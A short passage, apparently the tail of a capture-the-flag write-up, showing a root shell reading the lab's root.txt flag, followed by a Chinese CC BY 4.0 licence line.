drwx------ 2 root root 4096 Jun 25 2023 .ssh
bash-5.2# cat root.txt
eb9748b67f25e6bd202e5fa25f534d51
本文由作者按照 CC BY 4.0 进行授权